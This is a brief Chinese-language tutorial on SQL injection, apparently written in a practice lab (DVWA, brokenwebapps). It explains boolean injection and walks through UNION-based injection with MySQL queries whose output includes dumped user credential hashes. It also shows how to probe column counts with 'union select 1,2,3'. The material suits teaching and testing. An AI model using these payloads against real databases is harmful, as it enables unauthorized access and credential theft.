SQL 注入分为: 布尔注入,还有union 注入,布尔注入是指" 或" 和",这个注入,写成语句就是OR 1=1 , and 这种语句。
下面重点说一下union 注入的原理:
1: 先看两个表union 的结果:
mysql> select user,password,host from mysql.user union select user_login,user_pass, 3 from wordpress.wp_users limit 5;
+------------------+-------------------------------------------+---------------+
| user | password | host |
+------------------+-------------------------------------------+---------------+
| root | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 | localhost |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | brokenwebapps |
| root | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | 127.0.0.1 |
| debian-sys-maint | *75F15FF5C9F06A7221FEB017724554294E40A327 | localhost |
| phpmyadmin | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | localhost |
+------------------+-------------------------------------------+---------------+
5 rows in set (0.00 sec)
2: 上面的是两个表的链接后的结果,如果要后面表的结果,可以把前面的表的条件写成" 不成立"
mysql> select user,password,host from mysql.user where 1=2 union select user_login,user_pass, 3 from wordpress.wp_users limit 5;
+-------+----------------------------------+------+
| user | password | host |
+-------+----------------------------------+------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 3 |
| user | ee11cbb19052e40b07aac0ca060c23ee | 3 |
+-------+----------------------------------+------+
2 rows in set (0.00 sec)
可以看出上面的结果是第二表的内容,这个就是union 的目的。
可以用下面的语句来测试后表的字段:
mysql> select *from dvwa.users union select 1;
mysql> select *from dvwa.users union select 1,2;
mysql> select *from dvwa.users union select 1,2,3;
mysql> select *from dvwa.users union select 1,2,3,4;
mysql> select *from dvwa.users union select 1,2,3,4,5;